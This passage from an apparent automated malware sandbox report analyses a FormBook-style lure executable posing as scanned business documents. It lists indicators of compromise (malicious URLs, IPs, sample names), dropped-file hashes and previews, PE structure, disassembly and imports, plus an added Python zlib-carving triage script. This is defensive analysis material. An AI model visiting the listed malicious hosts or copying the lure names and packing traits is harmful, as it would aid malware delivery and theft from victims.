AMAZON-02US | UjCrfOAkJJiZyZh.exe | malicious | FormBook, PureLog Stealer | 75.2.115.196
AMAZON-02US | vzPAucRnt7.exe | malicious | Unknown | 54.244.188.177
AMAZON-02US | .exe | malicious | Unknown | 52.42.85.34
AMAZON-02US | http://beonlineboo.com | malicious | Unknown | 35.165.37.251
AMAZON-02US | https://logicalisuk.my.salesforce.com/setup/emailverif?oid=00D3z000001dzz1&k=Cj4KNQoPMDBEM3owMDAwMDFkenoxEg8wMkczejAwMDAwMFdWOE4aDzAwNTN6MDAwMDBCdWh6dSAFGN_3tJGSMhIQI3v2gs0Smh5HbrrPi2pb3BoMcA-pPOdt_d3-rPC6InFa7HDV_iW9LDPj8xH7hSk3un-1pgfjZvlK5Tv9PNw3ZrbyGYfST1J6GqYfWaKhB7o4-QA7gl67FLrZibn5D9yjxqT_I5lQp1_GTYo4JMlLKQM4byvWuZajquUzFQE2W0EVG_exs3QFRWcL3FGdq-ebSw%3D%3D | malicious | Unknown | 99.81.213.111
AMAZON-02US | CV.vbs | malicious | Xmrig | 3.6.115.64
AMAZON-02US | unLc6VekkL.elf | malicious | Mirai | 35.160.185.9
AMAZON-02US | 17nDkQW4tK.elf | malicious | Mirai | 54.183.174.200
AMAZON-02US | 2PQz3l61Pc.elf | malicious | Mirai | 13.236.43.129
AMAZON-02US | botx.mips.elf | malicious | Mirai | 50.18.22.244
COGENT-174US | payment copy pdf.exe | malicious | FormBook | 154.41.249.2
COGENT-174US | Yg4Sqy06Al.exe | malicious | FormBook | 38.47.158.160
COGENT-174US | http://url4388.parishsoft.com/ls/click?upn=u001.Vpzjdhwu4OAeGaWRMrv2bG-2BoISIIiNCoMwLNb33p6s9puXP6QsXcB55N2OsZ6QIQL6ualISvA6R9yFsi3QAkMw-3D-3DXnsm_4xqsswqm6jfqRi4Z9uMkjQPQ2PkIkpXiS7DDGAZwwqNkGayHBacrLCvWB6Ugb4mkRZ3VOwT8CtgdDvVzoEhuyk6RBXBzMUCiGffZILgz6kR-2FL0nL0bxsibxsiUMijyxKfmLW891ickSrYKqWpAo9hCEcRsdCC2tujtVQQrSV8Vz2uroyKvadQlzhc4JKhA7jHhTUxKABBY7atxFYwVCPFB5me96L6dyoMp-2FtDuDTirn5yJY0-2FgMFIFSldNhOOGkWZFlvdMYsSUWRFKEWdA6MNjw9lUNWdhKLgUqvqHz9yAXZOqRQ6z8xUDj4ZDVoAP4jrKwzE6kfZ8QZJlON1P64VH3LTUAC-2F3-2Bu3E-2Bv-2F-2FvtH0U-3D | malicious | Unknown | 38.180.80.71
COGENT-174US | 17nDkQW4tK.elf | malicious | Mirai | 38.148.41.21
COGENT-174US | MenSncKnTI.exe | malicious | Xmrig | 149.102.143.109
COGENT-174US | .5r3fqt67ew531has4231.x86.elf | malicious | Mirai, Gafgyt, Moobot, Okiru | 38.192.195.53
COGENT-174US | 66af531b832ee_main.exe | malicious | Vidar | 38.180.132.96
COGENT-174US | 66af4e35e761b_doz.exe | malicious | Vidar | 38.180.132.96
COGENT-174US | Urq5Bp4bgs.elf | malicious | Unknown | 74.63.92.214
COGENT-174US | yLfAxBEcuo.exe | malicious | Cryptbot, Vidar, Xmrig | 38.180.132.96
ACENS_ASSpainHostinghousingandVPNservicesES | b2bXo6vmDm.exe | malicious | SystemBC | 217.116.5.231
ACENS_ASSpainHostinghousingandVPNservicesES | 5CxmQXL0LD.exe | malicious | SystemBC | 82.194.91.200
ACENS_ASSpainHostinghousingandVPNservicesES | HSBCscancopy-invoice778483-payment87476MT103.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | Request for Quotation - (SM Store San Mateo).exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | D02984-KP-002011.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | REQN#1010135038.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | pismo1A 12.06.2024.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | RFQ for Maintenance usering for Sabratha Project.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | CFV20240600121.exe | malicious | FormBook | 217.116.0.191
ACENS_ASSpainHostinghousingandVPNservicesES | file.exe | malicious | SystemBC | 217.116.0.152
VNPT-AS-VNVNPTCorpVN | payment copy pdf.exe | malicious | FormBook | 203.161.55.124
VNPT-AS-VNVNPTCorpVN | PR44238-43433.exe | malicious | FormBook | 203.161.49.193
VNPT-AS-VNVNPTCorpVN | Yg4Sqy06Al.exe | malicious | FormBook | 203.161.43.228
VNPT-AS-VNVNPTCorpVN | botx.mips.elf | malicious | Mirai | 14.254.239.106
VNPT-AS-VNVNPTCorpVN | payment voucher.exe | malicious | FormBook | 203.161.41.190
VNPT-AS-VNVNPTCorpVN | Shipment Files EG240711& EG240712.exe | malicious | FormBook | 203.161.46.201
VNPT-AS-VNVNPTCorpVN | wKrQaAEaJ4.elf | malicious | Mirai | 113.166.232.238
VNPT-AS-VNVNPTCorpVN | nblbw9JYDM.elf | malicious | Mirai | 123.31.16.73
VNPT-AS-VNVNPTCorpVN | Payment ConfirmationSwift copy.exe | malicious | FormBook, PureLog Stealer | 203.161.42.162
VNPT-AS-VNVNPTCorpVN | Shipping documentsInvoice and Packing List, Certificate of Origin.exe | malicious | FormBook | 203.161.42.162
                                                    No context
                                                    No context
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:ASCII text, with very long lines (28674), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):28674
                                                    Entropy (8bit):3.579135792364548
                                                    Encrypted:false
                                                    SSDEEP:768:XBQPkzXIfqkY4G04QhBgn2RDAmj0zC8xlOWw73Oy3K:wkcfqp4G04QhBc2FAk0XcC
                                                    MD5:61B2F60056D28ACEECBBF21323FF622B
                                                    SHA1:ADB2CA1461EDA74CA0111BE2FDD164BC92A71C62
                                                    SHA-256:1C49DD091F754EE65DF72744AC2345BAEE85E762E9DB2F0C70BC1E650566EF63
                                                    SHA-512:F7E193CB90EAE4C2741F58CA6A4C7261BBAA8665DC94561C958DBB48693E55143AC8A7589EC5E24A20B1FC56B29F1569BEF7C04DBCB6EAE57E95886E78916ABB
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:5}::=gjh=6jhhh575555:;:<g=;g555555;;=>9:=9g>;:555555;;=>9i=;gf<7555555;;=>::==g=;j555555;;=>9:=fg>;:555555;;=>9i=hgf;h555555;;=>::=jg=88555555;;=>9:>5g>87555555;;=>9i>7gf7j555555;;=>::>9g=;9555555;;=>9:>;g>;h555555;;=>9i>=gf;h555555;;=>::>f88h5;;=>9:>hg>;j555555;;=>=i99kkkkkkgf<9555555;;=>>:9;kkkkkkg=;9555555;;=>=:9=kkkkkkg>;h555555;;=>=i9fkkkkkkgf;h555555;;=>>:9hkkkkkkg=7j555555;;=>=:9jkkkkkkg>;9555555;;=>=i:5kkkkkkgf;h555555;;=>>::7kkkkkkg=;h555555;;=>=::9kkkkkk88h>;;=>=i:;kkkkkkgf<:555555;;=>::i5g=<8555555;;=>9:i7g>;:555555;;=>9ii9gf<7555555;;=>::i;g=88555555;;=>9:i=g>87555555;;=>9iifgf7j555555;;=>::ihg=;9555555;;=>9:ijg>;h555555;;=>9ij5gf;h555555;;=>::j788h5;;=>9:j9g>;6555555;;=>=i;=kkkkkkgf;9555555;;=>>:;fkkkkkkg=<;555555;;=>=:;hkkkkkkg>;6555555;;=>=i;jkkkkkkgf<5555555;;=>>:<5kkkkkkg=;>555555;;=>=:<7kkkkkkg>88555555;;=>=i<9kkkkkkgf87555555;;=>>:<;kkkkkkg=7j555555;;=>=:<=kkkkkkg>;9555555;;=>=i<fkkkkkkgf;h555555;;=>>:<hkkkkkkg=;h555555;;=>=:<jkkkkkk88h>;;=>9i=5gf<8555555;;=>::f5g=;=
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:zlib compressed data
                                                    Category:dropped
                                                    Size (bytes):271872
                                                    Entropy (8bit):7.99060672802885
                                                    Encrypted:true
                                                    SSDEEP:6144:93/gG9wXSsQIWyhZDcnx8GcGoxzmEjEtPSgkyHbP1KPNsnmTM/h/NTAP6XjagH:laXvQIThZyx89RxzmEjAwN2/hVamf
                                                    MD5:4269DE07B6806167BCB06EBB374AF6C9
                                                    SHA1:012FB1FB34124ED9DC7FFBB55CC50640F27BF632
                                                    SHA-256:C12C30FED87A5BD875A3E3FBD14A02FA1E312D90BC4B3B959E1699EB01723BF8
                                                    SHA-512:4647F9A8AA0970BFA294BE6AB4135B00150A74CC5A20A4FB6B3C9F6C2AB7B5FE622403CE3F87679E976369E9735166750A0050BDCEF0BBF825C9D028805F2379
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...f.CKQIk..\.....QJ..}@P..KQI365UCX4CCKQI365UCX4CCKQI365.CX4M\._I.?.t.Yx.b.9 @.E',?F".k2(]XZ!c:Qc1>?iZX......,/4g>;?qCX4CCKQ02?.h#?.~#,.tSQ.O...y#,.S...i#?.Y..uSQ..*;\~#,.I365UCX4..KQ.275D.AbCCKQI365.CZ5HB@QI'25UCX4CCKQY'65USX4CsOQI3v5USX4CAKQO365UCX4ECKQI365Us\4CAKQI365WC..CC[QI#65UCH4CSKQI365ECX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365{7=L7CKQ-!25USX4CWOQI#65UCX4CCKQI365uCXTCCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):9750
                                                    Entropy (8bit):7.650119562068247
                                                    Encrypted:false
                                                    SSDEEP:192:ekTYCxDR8l9LfBjZ/YiWQdLqBMhGuErhTGMjsHAR3zWdwcqA1WWE9:5T19WLxZ/YjQLqQPErhTGMZRDA1Fu
                                                    MD5:A27A9898EB223CF556D148FAAE7B79DE
                                                    SHA1:A1299150BA464E44A9220FABB93157B7EE69C62B
                                                    SHA-256:946EB2385D1CF442B627C7CCAE2CA9F084A5DE02AA1DB517671589BDD9B46F20
                                                    SHA-512:469CC7F01C8E98420DEF30DA2EBBF0E4786F97466B960C96154CAEEC52C1DCEF49D5BB81E94A8F5776FA3B8758322ADD7BE2E3B2703E90B68133F1FBC4CE7496
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:EA06..p...gS...h..V.E.k7.......yg.......k;..g...sg.N.@.]....i...K........|.`.o..g.N.......=.N...>.......m3..7.Z..u>..6...o.v..Z......g.>.N'....Z....N.m3.........>.Ng`...r.'.....c ....Af.H.....@.F.3<..Z..6...L.j........x..t....B|.....Y..0.N.3[<.x...Zf.5_..r....g`5_..z.U..l.5_....U..m@5_..j.U...5\..>3`..N.^.f.Z..u;.z..y;......@........G../Z.........j|....x.u....$.../.y=...g.G_T......-@>_.......zu:..........p...................`.M..`... ...h...@..P.'.9...{>K<..c.....Y.`._..z......>K8#G.g..3|v...G.9..&.8_..uh..i|v.....h.h.-.`......E..<..s.]....'v.;..=..S..L..6...f..+@.ff.y...;..m ...f..E...Y....3...............v............2p....<d....,vl...4.....!+@.'&.....,fy7.Zm6y......r.7.X...c3.L.ok.Y.!...Gf.....,f.>.Om`. .#<.....c..........z.h.s.....,vp...<..t.....40......g ....f.....4..@.6.-..p..S.U..7...S..N..;:.`..>..m....u=.....c....Z...wx.....vv.........E.....@y6....p.c3.M..9..b.!....F ....B5h..'.........vx......f..M.|...B3....@.;=.X...f.....H........g....M.S.T..h...
                                                    Process:C:\Windows\SysWOW64\schtasks.exe
                                                    File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                    Category:dropped
                                                    Size (bytes):114688
                                                    Entropy (8bit):0.9746603542602881
                                                    Encrypted:false
                                                    SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                    MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                    SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                    SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                    SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                    Malicious:false
                                                    Reputation:high, very likely benign file
                                                    Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                    Process:C:\Users\user\Desktop\Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File Type:zlib compressed data
                                                    Category:dropped
                                                    Size (bytes):271872
                                                    Entropy (8bit):7.99060672802885
                                                    Encrypted:true
                                                    SSDEEP:6144:93/gG9wXSsQIWyhZDcnx8GcGoxzmEjEtPSgkyHbP1KPNsnmTM/h/NTAP6XjagH:laXvQIThZyx89RxzmEjAwN2/hVamf
                                                    MD5:4269DE07B6806167BCB06EBB374AF6C9
                                                    SHA1:012FB1FB34124ED9DC7FFBB55CC50640F27BF632
                                                    SHA-256:C12C30FED87A5BD875A3E3FBD14A02FA1E312D90BC4B3B959E1699EB01723BF8
                                                    SHA-512:4647F9A8AA0970BFA294BE6AB4135B00150A74CC5A20A4FB6B3C9F6C2AB7B5FE622403CE3F87679E976369E9735166750A0050BDCEF0BBF825C9D028805F2379
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:...f.CKQIk..\.....QJ..}@P..KQI365UCX4CCKQI365UCX4CCKQI365.CX4M\._I.?.t.Yx.b.9 @.E',?F".k2(]XZ!c:Qc1>?iZX......,/4g>;?qCX4CCKQ02?.h#?.~#,.tSQ.O...y#,.S...i#?.Y..uSQ..*;\~#,.I365UCX4..KQ.275D.AbCCKQI365.CZ5HB@QI'25UCX4CCKQY'65USX4CsOQI3v5USX4CAKQO365UCX4ECKQI365Us\4CAKQI365WC..CC[QI#65UCH4CSKQI365ECX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365{7=L7CKQ-!25USX4CWOQI#65UCX4CCKQI365uCXTCCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4CCKQI365UCX4
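Two of the dropped files listed above are typed as zlib compressed data with an 8-bit entropy of 7.99 (flagged "Encrypted: true"). A common triage step for such drops is to locate every RFC 1950 zlib header in a buffer, inflate from each candidate and keep only the streams that decompress completely with a valid Adler-32 trailer. The script below is an added example and not part of the Joe Sandbox report; it runs on a blob constructed inline (an ASCII stub, zero padding, one zlib stream, trailing junk) and reads nothing from the files in the report.

```python
"""Carve and inflate zlib streams from a dropped-file blob.

Added example for this report, not Joe Sandbox code. The input blob is
constructed by build_sample_blob(); nothing is read from the report's files.
"""
import zlib


def zlib_header_offsets(blob: bytes) -> list:
    """Offsets of syntactically valid RFC 1950 headers: CM == 8 (deflate),
    CINFO <= 7 (window <= 32 KiB) and an FCHECK that makes CMF*256+FLG a
    multiple of 31. Cheap but noisy, so every hit is then actually inflated."""
    hits = []
    for i in range(len(blob) - 1):
        cmf, flg = blob[i], blob[i + 1]
        if cmf & 0x0F != 8 or (cmf >> 4) > 7:
            continue
        if (cmf * 256 + flg) % 31 != 0:
            continue
        hits.append(i)
    return hits


def carve_zlib_streams(blob: bytes, min_len: int = 16) -> list:
    """Inflate each candidate and keep only complete streams (zlib verifies the
    Adler-32 trailer and sets d.eof). Candidates that fall inside an already
    carved stream are skipped; trailing bytes land in d.unused_data."""
    streams = []
    skip_until = 0
    for off in zlib_header_offsets(blob):
        if off < skip_until:
            continue
        d = zlib.decompressobj()
        try:
            out = d.decompress(blob[off:])
        except zlib.error:          # bad block, bad Adler-32, or not a stream at all
            continue
        if not d.eof or len(out) < min_len:   # truncated stream or too small to matter
            continue
        consumed = len(blob) - off - len(d.unused_data)
        streams.append({"offset": off, "compressed_len": consumed,
                        "decompressed_len": len(out), "data": out})
        skip_until = off + consumed
    return streams


def build_sample_blob() -> bytes:
    """Constructed test input: a fake stub, zero padding, one compressed
    PE-like payload and trailing junk that is not part of the stream."""
    payload = b"MZ" + b"payload-bytes-" * 40
    return b"AUTOIT-STUB" + b"\x00" * 40 + zlib.compress(payload, 9) + b"\xff" * 20


if __name__ == "__main__":
    for s in carve_zlib_streams(build_sample_blob()):
        print(f"zlib stream at offset {s['offset']:#x}: {s['compressed_len']} bytes "
              f"-> {s['decompressed_len']} bytes, starts with {s['data'][:2]!r}")
```

The header check alone produces false positives (any byte pair with the right residue modulo 31 passes), which is why the decompressor result, not the header, decides what is kept; on a real drop, hand each carved buffer to the same PE checks you would apply to the original sample.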
                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.186205860358144
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:Scanned Docs from Emnes Metal Sdn Bhd_.exe
                                                    File size:1'261'056 bytes
                                                    MD5:75d0bfd0499f3bb0c94a45a80e92476b
                                                    SHA1:af86c882a44b250a8dc8a3c116eee075351740d0
                                                    SHA256:b12b14169932a016209c31797d3a3d18a151f15615e9dc7345d36498fb7e6d07
                                                    SHA512:826c5defe65e4ecc7092c6535374809c237e445dd4992ea6ee2a81d7cf374067212233a726bf0e18950285217829a393f7ba4bd9dec710c6225795d0b290c09c
                                                    SSDEEP:24576:PqDEvCTbMWu7rQYlBQcBiT6rprG8a871bqS1s28SanAq:PTvC/MTQYxsWR7a871eZA
                                                    TLSH:3245C00273D1D022FF9B91734B5AF6115ABC6E660123E61F13982D79BE701B1163E7A3
                                                    File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                                                    Icon Hash:6142420142183038
                                                    Entrypoint:0x420577
                                                    Entrypoint Section:.text
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                    DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x66AACABC [Wed Jul 31 23:37:32 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:1
                                                    File Version Major:5
                                                    File Version Minor:1
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:1
                                                    Import Hash:948cc502fe9226992dce9417f952fce3
                                                    Instruction
                                                    call 00007F6A7903E503h
                                                    jmp 00007F6A7903DE0Fh
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F6A7903DFEDh
                                                    mov dword ptr [esi], 0049FDF0h
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FDF8h
                                                    mov dword ptr [ecx], 0049FDF0h
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    push dword ptr [ebp+08h]
                                                    mov esi, ecx
                                                    call 00007F6A7903DFBAh
                                                    mov dword ptr [esi], 0049FE0Ch
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    and dword ptr [ecx+04h], 00000000h
                                                    mov eax, ecx
                                                    and dword ptr [ecx+08h], 00000000h
                                                    mov dword ptr [ecx+04h], 0049FE14h
                                                    mov dword ptr [ecx], 0049FE0Ch
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    and dword ptr [eax], 00000000h
                                                    and dword ptr [eax+04h], 00000000h
                                                    push eax
                                                    mov eax, dword ptr [ebp+08h]
                                                    add eax, 04h
                                                    push eax
                                                    call 00007F6A79040BADh
                                                    pop ecx
                                                    pop ecx
                                                    mov eax, esi
                                                    pop esi
                                                    pop ebp
                                                    retn 0004h
                                                    lea eax, dword ptr [ecx+04h]
                                                    mov dword ptr [ecx], 0049FDD0h
                                                    push eax
                                                    call 00007F6A79040BF8h
                                                    pop ecx
                                                    ret
                                                    push ebp
                                                    mov ebp, esp
                                                    push esi
                                                    mov esi, ecx
                                                    lea eax, dword ptr [esi+04h]
                                                    mov dword ptr [esi], 0049FDD0h
                                                    push eax
                                                    call 00007F6A79040BE1h
                                                    test byte ptr [ebp+08h], 00000001h
                                                    pop ecx
                                                    Programming Language:
                                                    • [ C ] VS2008 SP1 build 30729
                                                    • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x5d37c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x132000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x5d37c | 0x5d400 | aaf0a83192f29627e1716016cd081f7a | False | 0.9707345425603218 | data | 7.96880676518361 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x132000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd4458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd4580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd46a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd47d0 | 0x1024 | Device independent bitmap graphic, 32 x 62 x 32, image size 3968, resolution 4724 x 4724 px/m | English | Great Britain | 0.23426911907066797
RT_MENU | 0xd57f4 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xd5844 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xd5dd8 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xd6464 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xd68f4 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xd6ef0 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xd754c | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xd79b4 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xd7b0c | 0x59354 | data | - | - | 1.0003311475768755
RT_GROUP_ICON | 0x130e60 | 0x14 | data | English | Great Britain | 1.2
RT_GROUP_ICON | 0x130e74 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x130e88 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x130e9c | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x130eb0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x130f8c | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
